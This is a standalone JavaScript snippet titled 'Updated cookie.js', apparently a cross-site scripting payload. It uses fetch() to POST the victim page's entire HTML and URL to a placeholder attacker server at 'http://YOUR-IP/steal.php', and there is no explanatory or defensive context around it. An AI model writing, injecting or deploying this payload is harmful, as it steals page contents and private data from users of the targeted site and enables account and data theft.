// Updated cookie.js fetch('http://YOUR-IP/steal.php', { method: 'POST', body: JSON.stringify({ html: document.documentElement.innerHTML, url: window.location.href }), headers: { 'Content-Type': 'application/json' } });